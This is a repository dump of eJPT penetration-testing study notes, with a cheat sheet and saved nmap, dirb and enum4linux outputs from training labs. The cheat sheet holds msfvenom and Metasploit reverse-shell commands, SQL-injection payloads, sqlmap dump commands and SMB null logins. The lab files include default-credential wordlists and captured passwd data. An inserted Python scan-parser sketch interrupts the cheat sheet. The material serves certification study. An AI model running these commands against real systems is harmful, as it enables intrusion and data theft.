Repository: JasonTurley/eJPT
Branch: main
Commit: 4a608ce9afa0
Files: 71
Total size: 126.3 KB

Directory structure:
gitextract_f6pnax8e/
├── LICENSE
├── README.md
├── cheat-sheet.md
├── ine-labs/
│   ├── arp-poisoning/
│   │   ├── alive_hosts.txt
│   │   └── nmap_scan.txt
│   ├── black-box1/
│   │   ├── alive_hosts.txt
│   │   ├── dot101_DONE/
│   │   │   ├── README.md
│   │   │   ├── default-passwords.txt
│   │   │   ├── default-users.txt
│   │   │   └── passwd
│   │   ├── dot140_done/
│   │   │   ├── dirb_scan2.txt
│   │   │   ├── sdadas.txt
│   │   │   └── test1.txt
│   │   ├── dot199/
│   │   │   ├── enum4linux.txt
│   │   │   └── nmap_scan.txt
│   │   ├── id_rsa.pub
│   │   ├── initial_nmap_scan.txt
│   │   ├── possible-usernames.txt
│   │   └── thorough_nmap_scan.txt
│   ├── black-box2/
│   │   ├── alive_hosts.txt
│   │   ├── dot166_DONE/
│   │   │   ├── dirb_scan.txt
│   │   │   ├── for_hydra.txt
│   │   │   └── names.txt
│   │   ├── dot81_DONE/
│   │   │   ├── dirb_scan.txt
│   │   │   └── users.bak
│   │   ├── dot91/
│   │   │   ├── dirb_scan.txt
│   │   │   ├── gobuster_foocorp_scan.txt
│   │   │   ├── gobuster_foocorp_scan2.txt
│   │   │   ├── gobuster_scan.txt
│   │   │   ├── myapp.html
│   │   │   └── php-reverse-shell.php
│   │   ├── dot92_DONE/
│   │   │   ├── dirb_scan.txt
│   │   │   └── user-hashes.txt
│   │   └── thorough_nmap_scan.txt
│   ├── black-box3/
│   │   ├── alive_hosts.txt
│   │   ├── dot220/
│   │   │   └── gobuster_scan.txt
│   │   ├── dot234/
│   │   │   ├── for_john.txt
│   │   │   ├── gobuster_scan.txt
│   │   │   ├── index.php
│   │   │   ├── revshell.php
│   │   │   └── scan_xyz.txt
│   │   └── thorough_nmap_scan.txt
│   ├── bruteforce-and-password-cracking/
│   │   ├── alive_hosts.txt
│   │   ├── for_john.txt
│   │   ├── nmap_scan.txt
│   │   ├── passwd
│   │   └── shadow
│   ├── dirbuster/
│   │   ├── alive_hosts.txt
│   │   └── nmap_scan.txt
│   ├── exploit-based-cpp/
│   │   ├── exploit.cpp
│   │   └── keylogger.cpp
│   ├── metasploit/
│   │   ├── README.md
│   │   ├── hashdump.txt
│   │   └── nmap_scan.txt
│   ├── nessus/
│   │   └── nmap_scan.txt
│   ├── null-session/
│   │   ├── Congratulations.txt
│   │   ├── alive_hosts.txt
│   │   ├── enum4linux_scan.txt
│   │   └── nmap_scan.txt
│   ├── practice/
│   │   ├── hello.php
│   │   ├── index.html
│   │   ├── my-ls.sh
│   │   ├── script.sh
│   │   ├── sequences.sh
│   │   └── shell.php
│   ├── python-assisted-exploitation/
│   │   └── brute-forcer.py
│   └── scanning-and-os-fingerprinting/
│       ├── fping_scan.txt
│       ├── nmap_ping_scan.txt
│       ├── nmap_syn_scan.txt
│       └── nmap_version_and_os.txt
└── scripts/
    └── eEnum.sh

================================================
FILE CONTENTS
================================================

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2022 Jason Turley

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

================================================
FILE: README.md
================================================
# eJPT

My notes and lab solutions from studying for the eLearnSecurity Junior Penetration Tester certificate.

## Cheat Sheet

Check out the [cheatsheet](./cheat-sheet.md) for a list of useful commands and tips.

================================================
FILE: cheat-sheet.md
================================================
# Cheat Sheet

This cheat sheet is a list of commands to help with the black box pen test engagements.

## Networking

Check routing table information

```
$ route
$ ip route
```

Add a network to current route

```
$ ip route add 192.168.10.0/24 via 10.175.3.1
$ route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1
```

DNS

```
$ nslookup mysite.com
$ dig mysite.com
```

## Subdomain Enumeration

- [Sublist3r](https://github.com/aboul3la/Sublist3r)
- [DNSdumpster](https://dnsdumpster.com/)

## Footprinting & Scanning

Find live hosts with fping or nmap

```
$ fping -a -g 172.16.100.40/24 2>/dev/null | tee alive_hosts.txt
$ nmap -sn 172.16.100.40/24 -oN alive_hosts.txt
```

nmap scan types

```
-sS: TCP SYN Scan (aka Stealth Scan)
-sT: TCP Connect Scan
-sU: UDP Scan
-sn: Ping Scan
-sV: Service Version information
-O: Operating System information
```

### Spotting a Firewall

If an nmap TCP scan identified a well-known service, such as a web server, but cannot detect the version, then there may be a firewall in place.

For example:

```
PORT STATE SERVICE REASON VERSION
80/tcp open http? syn-ack ttl 64
```

Another example:

```
80/tcp open tcpwrapped
```

**"tcpwrapped"** means the TCP handshake was completed, but the remote host closed the connection without receiving any data.

These are both indicators that a firewall is blocking our scan of the target!

Tips:

- Use "--reason" to see why a port is marked open or closed
- If a "RST" packet is received, then something prevented the connection - probably a firewall!

## Masscan

Masscan is designed to scan thousands of IP addresses at once.

## Vulnerability Assessment

Use the information from the Enumeration/Footprinting phases to find a vulnerable threat vector.

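The two indicators from the "Spotting a Firewall" section above (`tcpwrapped`, and a guessed service name such as `http?` with no version) can be pulled out of saved `nmap -oN` output mechanically. The following Python sketch is an added example, not part of the original repository; the scan text, the 192.0.2.x hosts and the names `firewall_indicators` and `Finding` are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample in `nmap -oN` layout (not one of the repository's scans).
# The first host was scanned with --reason, the second without it.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open  http?   syn-ack ttl 64

Nmap scan report for 192.0.2.20
PORT     STATE  SERVICE    VERSION
80/tcp   open   tcpwrapped
443/tcp  open   ssl/http   Apache httpd 2.4.18
8080/tcp closed http-proxy
"""

# "<port>/<proto> <state> <service> [rest of line]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# REASON column as printed by --reason: "syn-ack" or "syn-ack ttl 64"
REASON = re.compile(r"^([a-z-]+(?:\s+ttl\s+\d+)?)\s*(.*)$")


@dataclass
class Finding:
    host: str
    port: int
    proto: str
    service: str
    reason: str      # empty when the scan was run without --reason
    indicator: str   # "tcpwrapped" or "no-version"


def firewall_indicators(nmap_text):
    """Return open ports that show one of the cheat sheet's two indicators."""
    findings = []
    host, has_reason = "", False
    for raw in nmap_text.splitlines():
        line = raw.strip()
        if line.startswith("Nmap scan report for "):
            host, has_reason = line[len("Nmap scan report for "):], False
            continue
        if line.startswith("PORT"):
            # The table header tells us whether a REASON column is present.
            has_reason = "REASON" in line.split()
            continue
        m = PORT_LINE.match(line)
        if not m or m.group(3) != "open":
            continue
        port, proto, _state, service, rest = m.groups()
        reason, version = "", (rest or "")
        if has_reason:
            rm = REASON.match(version)
            if rm:
                reason, version = rm.group(1), rm.group(2)
        if service == "tcpwrapped":
            # Handshake completed, connection closed before any data was exchanged.
            indicator = "tcpwrapped"
        elif service.endswith("?") and not version:
            # Service name guessed from the port number, no version detected.
            indicator = "no-version"
        else:
            continue
        findings.append(Finding(host, int(port), proto, service, reason, indicator))
    return findings


if __name__ == "__main__":
    for f in firewall_indicators(SAMPLE_SCAN):
        print(f"{f.host} {f.port}/{f.proto} {f.service}: {f.indicator} "
              f"(reason: {f.reason or 'n/a'})")
```

A hit is only an indicator, as the notes say; rerunning the scan with `--reason` fills in the `reason` field and shows what was actually received.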
Below are some helpful vulnerability assessment resources:

- Searchsploit
- ExploitDB
- Msfconsole search command
- Google
- Nessus

## Web Server Fingerprinting

Use netcat for HTTP banner grabbing:

```
$ nc <target> 80
HEAD / HTTP/1.0
```

Use OpenSSL for HTTPS banner grabbing:

```
$ openssl s_client -connect target.site:443
HEAD / HTTP/1.0
```

httprint is a web fingerprinting tool that uses a **signature-based** technique to identify web servers. This is more accurate since sysadmins can customize web server banners.

```
$ httprint -P0 -h <target> -s <signature file>
```

## Directory and File Enumeration

Pick your favorite URI enumeration tool:

- Gobuster - fast, multi-threaded scanner
- Dirbuster - nice GUI
- Dirb - recursively scans directories

## XSS

Look to exploit user input coming from:

- Request headers
- Cookies
- Form inputs
- POST parameters
- GET parameters

Check for XSS

```
some text
```

Steal cookies:

```
```

## SQL Injection

Same injection points as XSS.

Boolean Injection:

- and 1=1; -- -
- or 'a'='a'; -- -

Once you determine that a site is vulnerable to SQLi, automate with sqlmap.

```
$ sqlmap -u <url>
$ sqlmap -u <url> -p <parameter>
$ sqlmap -u <url> --tables
$ sqlmap -u <url> -D <database> -T <table> --dump
```

## Windows Shares Enumeration

Check what shares are available on a host

```
$ smbclient -L //ip
$ enum4linux -a ip_address
```

## SMB Null Attack

Try to log in without a username or password:

```
$ smbclient //ip/share -N
```

## MySQL Database commands

Log in to MySQL with a password

```
$ mysql --user=root --port=13306 -p -h 172.16.64.81
```

```
> SHOW databases;
> SHOW tables FROM database;
> USE database;
> SELECT * FROM table;
```

Change table entry values

```
# Add the user tracking1 to the "adm" group
> update users set adm="yes" where username="tracking1";
```

## Meterpreter reverse shell

1. Find vulnerability in target (e.g. LFI/RFI)
2. Set up a Metasploit listener

```
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp # or any payload you wish
set lhost <your-ip>
set lport <port> # set to a port open on the target to bypass firewall
run
```

3. Create a matching meterpreter-based executable using msfvenom

```
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=<your-ip> lport=<port> -f elf -o meter
```

4. Upload the payload to target (e.g. LFI/RFI)

## Adding Virtual Hosts

In the black box practice labs, we had to add a virtual host to /etc/hosts in order to connect to the webpage.

```
$ sudo vim /etc/hosts
<target-ip> static.foobar.org
```

## Misc

- Found a webshell/admin panel on a site?
    - Run phpinfo(); to determine if it is a PHP shell
    - Try to get a reverse shell connection
- Check for flag in the user's home directory
- Enumerate, enumerate, enumerate

================================================
FILE: ine-labs/arp-poisoning/alive_hosts.txt
================================================
10.100.13.36
10.100.13.37
10.100.13.140

================================================
FILE: ine-labs/arp-poisoning/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Sun Feb 21 18:21:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 10.100.13.36
Host is up (0.085s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.100.13.37
Host is up (0.071s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.100.13.140
Host is up (0.00020s latency).
All 1000 scanned ports on 10.100.13.140 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 21 18:21:39 2021 -- 3 IP addresses (3 hosts up) scanned in 7.52 seconds

================================================
FILE: ine-labs/black-box1/alive_hosts.txt
================================================
172.16.64.101
172.16.64.140
172.16.64.182
172.16.64.199

================================================
FILE: ine-labs/black-box1/dot101_DONE/README.md
================================================
# Apache Tomcat Webserver

## Recon

Running gobuster shows a hidden /manager directory that requires a username and password.

The 401 Unauthorized error page shows an example with username=tomcat and password=s3cret.

## Initial Exploitation

Use msfconsole to search for an Apache Tomcat manager exploit

```
meterpreter > getuid
tomcat8
meterpreter > sysinfo
Computer : xubuntu
OS : Linux 4.4.0-104-generic (amd64)
Meterpreter : java/linux
```

Search for the flag:

```
meterpreter > search -f flag.txt
Found 2 results...
/home/adminels/Desktop/flag.txt (12 bytes)
/home/developer/flag.txt (29 bytes)
meterpreter > cat /home/adminels/Desktop/flag.txt
You did it!
meterpreter > cat /home/developer/flag.txt
Congratulations, you got it!
```

Other users in the home directory:

```
adminels
developer
elsuser
```

================================================
FILE: ine-labs/black-box1/dot101_DONE/default-passwords.txt
================================================
admin
tomcat
password
password1
Password1
manager
root
toor
r00t
s3cret
role1
changethis

================================================
FILE: ine-labs/black-box1/dot101_DONE/default-users.txt
================================================
admin
root
tomcat
role
role1
manager

================================================
FILE: ine-labs/black-box1/dot101_DONE/passwd
================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:115:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false
saned:x:118:127::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:120:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
elsuser:x:1000:1000:elsuser,,,:/home/elsuser:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
tomcat8:x:122:129::/usr/share/tomcat8:/bin/false

================================================
FILE: ine-labs/black-box1/dot140_done/dirb_scan2.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb_scan2.txt
START_TIME: Wed Feb 24 14:11:27 2021
URL_BASE: http://172.16.64.140/project/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: admin:admin

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.64.140/project/ ----
==> DIRECTORY: http://172.16.64.140/project/backup/
==> DIRECTORY: http://172.16.64.140/project/css/
==> DIRECTORY: http://172.16.64.140/project/images/
+ http://172.16.64.140/project/includes (CODE:403|SIZE:304)
+ http://172.16.64.140/project/index.html (CODE:200|SIZE:6525)

---- Entering directory: http://172.16.64.140/project/backup/ ----
==> DIRECTORY: http://172.16.64.140/project/backup/backup/
==> DIRECTORY: http://172.16.64.140/project/backup/css/
==> DIRECTORY: http://172.16.64.140/project/backup/images/
+ http://172.16.64.140/project/backup/index.html (CODE:200|SIZE:6525)
==> DIRECTORY: http://172.16.64.140/project/backup/test/

---- Entering directory: http://172.16.64.140/project/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.64.140/project/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.64.140/project/backup/backup/ ----

================================================
FILE: ine-labs/black-box1/dot140_done/sdadas.txt
================================================
Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;
/var/www/html/project/354253425234234/flag.txt

================================================
FILE: ine-labs/black-box1/dot140_done/test1.txt
================================================
https://stackoverflow.com/questions/1134319/difference-between-a-user-and-a-login-in-sql-server

================================================
FILE: ine-labs/black-box1/dot199/enum4linux.txt
================================================
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 24 12:24:59 2021

==========================
| Target Information |
==========================
Target ........... 172.16.64.199
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=====================================================
| Enumerating Workgroup/Domain on 172.16.64.199 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 172.16.64.199 |
=============================================
Looking up status of 172.16.64.199
    WIN10 <00> - B Workstation Service
    WORKGROUP <00> - B Domain/Workgroup Name
    WIN10 <20> - B File Server Service

    MAC Address = 00-50-56-A2-AD-96

======================================
| Session Check on 172.16.64.199 |
======================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

================================================
FILE: ine-labs/black-box1/dot199/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 24 12:18:57 2021 as: nmap -sV --reason -oN nmap_scan.txt 172.16.64.199
Nmap scan report for 172.16.64.199
Host is up, received conn-refused (0.070s latency).
Not shown: 996 closed ports
Reason: 996 conn-refused
PORT     STATE SERVICE       REASON  VERSION
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
1433/tcp open  ms-sql-s      syn-ack Microsoft SQL Server 2014 12.00.2000
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 24 12:19:30 2021 -- 1 IP address (1 host up) scanned in 33.26 seconds

================================================
FILE: ine-labs/black-box1/id_rsa.pub
================================================

================================================
FILE: ine-labs/black-box1/initial_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Tue Feb 23 21:45:06 2021 as: nmap -sV -O -iL alive_hosts.txt -oN initial_nmap_scan.txt
Nmap scan report for 172.16.64.10
Host is up (0.00021s latency).
All 1000 scanned ports on 172.16.64.10 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

Nmap scan report for 172.16.64.101
Host is up (0.061s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
9080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:50:56:A2:CE:79 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.16.64.140
Host is up (0.062s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:50:56:A2:ED:B9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop

Nmap scan report for 172.16.64.182
Host is up (0.068s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:50:56:A2:10:16 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.16.64.199
Host is up (0.065s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000
MAC Address: 00:50:56:A2:AD:96 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 23 21:45:54 2021 -- 5 IP addresses (5 hosts up) scanned in 48.25 seconds

================================================
FILE: ine-labs/black-box1/possible-usernames.txt
================================================
elsadmin
adminels
elsuser
developer
tomcat
manager
root
admin
dummy
nao12023

================================================
FILE: ine-labs/black-box1/thorough_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 24 13:41:35 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt
Nmap scan report for 172.16.64.101
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
|   256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_  256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
8080/tcp  open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp  open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
59919/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:50:56:A2:CE:79 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.129 days (since Wed Feb 24 10:38:56 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   74.30 ms 172.16.64.101

Nmap scan report for 172.16.64.140
Host is up (0.081s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 404 HTML Template by Colorlib
MAC Address: 00:50:56:A2:ED:B9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.130 days (since Wed Feb 24 10:38:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT      ADDRESS
1   81.49 ms 172.16.64.140

Nmap scan report for 172.16.64.182
Host is up (0.067s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
|   256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_  256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
MAC Address: 00:50:56:A2:10:16 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.130 days (since Wed Feb 24 10:37:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   67.08 ms 172.16.64.182

Nmap scan report for 172.16.64.199
Host is up (0.072s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: WIN10
|   NetBIOS_Domain_Name: WIN10
|   NetBIOS_Computer_Name: WIN10
|   DNS_Domain_Name: WIN10
|   DNS_Computer_Name: WIN10
|_  Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-24T02:21:11
| Not valid after: 2051-02-24T02:21:11
| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e
|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d
|_ssl-date: 2021-02-24T18:46:09+00:00; +1m15s from scanner time.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49943/tcp open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
|   Target_Name: WIN10
|   NetBIOS_Domain_Name: WIN10
|   NetBIOS_Computer_Name: WIN10
|   DNS_Domain_Name: WIN10
|   DNS_Computer_Name: WIN10
|_  Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-24T02:21:11
| Not valid after: 2051-02-24T02:21:11
| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e
|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d
|_ssl-date: 2021-02-24T18:46:09+00:00; +1m14s from scanner time.
MAC Address: 00:50:56:A2:AD:96 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.134 days (since Wed Feb 24 10:32:02 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m14s, deviation: 0s, median: 1m13s
| ms-sql-info:
|   172.16.64.199:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:ad:96 (VMware)
| Names:
|   WIN10<00> Flags:
|   WORKGROUP<00> Flags:
|_  WIN10<20> Flags:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-24T18:46:04
|_  start_date: 2021-02-24T02:21:09

TRACEROUTE
HOP RTT      ADDRESS
1   71.66 ms 172.16.64.199

Post-scan script results:
| ssh-hostkey: Possible duplicate hosts
| Key 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) used by:
|   172.16.64.101
|   172.16.64.182
